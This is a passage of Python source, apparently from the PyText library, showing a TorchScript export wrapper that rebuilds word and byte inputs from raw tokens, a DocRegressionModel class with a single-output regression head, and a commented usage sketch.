output_layer = self.output_layer.torchscript_predictions()
max_byte_len = tensorizers["token_bytes"].max_byte_len
byte_offset_for_non_padding = tensorizers["token_bytes"].offset_for_non_padding
input_vocab = tensorizers["tokens"].vocab
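
        # Unlike DocModel's script wrapper, this module also reconstructs the
        # byte-level inputs from the raw tokens at inference time.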
class Model(jit.ScriptModule):
def __init__(self):
super().__init__()
self.vocab = Vocabulary(input_vocab, unk_idx=input_vocab.idx[UNK])
self.max_byte_len = jit.Attribute(max_byte_len, int)
self.byte_offset_for_non_padding = jit.Attribute(
byte_offset_for_non_padding, int
)
self.pad_idx = jit.Attribute(input_vocab.idx[PAD], int)
self.model = traced_model
self.output_layer = output_layer

            @jit.script_method
def forward(self, tokens: List[List[str]]):
seq_lens = make_sequence_lengths(tokens)
word_ids = self.vocab.lookup_indices_2d(tokens)
word_ids = pad_2d(word_ids, seq_lens, self.pad_idx)
token_bytes, _ = make_byte_inputs(
tokens, self.max_byte_len, self.byte_offset_for_non_padding
)
logits = self.model(
torch.tensor(word_ids), token_bytes, torch.tensor(seq_lens)
)
return self.output_layer(logits)

        return Model()


class DocRegressionModel(DocModel):
"""
Model that's compatible with the new Model abstraction, and is configured for
regression tasks (specifically for labels, predictions, and loss).
"""

    class Config(DocModel.Config):
class RegressionModelInput(DocModel.Config.ModelInput):
tokens: TokenTensorizer.Config = TokenTensorizer.Config()
labels: NumericLabelTensorizer.Config = NumericLabelTensorizer.Config()

        inputs: RegressionModelInput = RegressionModelInput()
output_layer: RegressionOutputLayer.Config = RegressionOutputLayer.Config()
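
    # Same wiring as DocModel.from_config, but with a single scalar output
    # (out_dim=1) and a regression output layer.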
@classmethod
def from_config(cls, config: Config, tensorizers: Dict[str, Tensorizer]):
embedding = cls.create_embedding(config, tensorizers)
representation = create_module(
config.representation, embed_dim=embedding.embedding_dim
)
decoder = create_module(
config.decoder, in_dim=representation.representation_dim, out_dim=1
)
output_layer = RegressionOutputLayer.from_config(config.output_layer)
return cls(embedding, representation, decoder, output_layer)
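

# ---------------------------------------------------------------------------
# Usage sketch (illustrative only; not part of the library). It shows how a
# DocModel is typically built from its config and run on one batch. The
# `tensorizers` dict, `tensor_dict`, and `traced_model` below are assumed to
# come from a PyText task / data handler / jit.trace call and are hypothetical
# here.
#
#     config = DocModel.Config()
#     model = DocModel.from_config(config, tensorizers)
#     logits = model(*model.arrange_model_inputs(tensor_dict))
#     targets = model.arrange_targets(tensor_dict)
#
#     # Export for serving: the scripted module accepts raw string tokens.
#     ts_model = model.torchscriptify(tensorizers, traced_model)
#     scores = ts_model([["hello", "world"]])
# ---------------------------------------------------------------------------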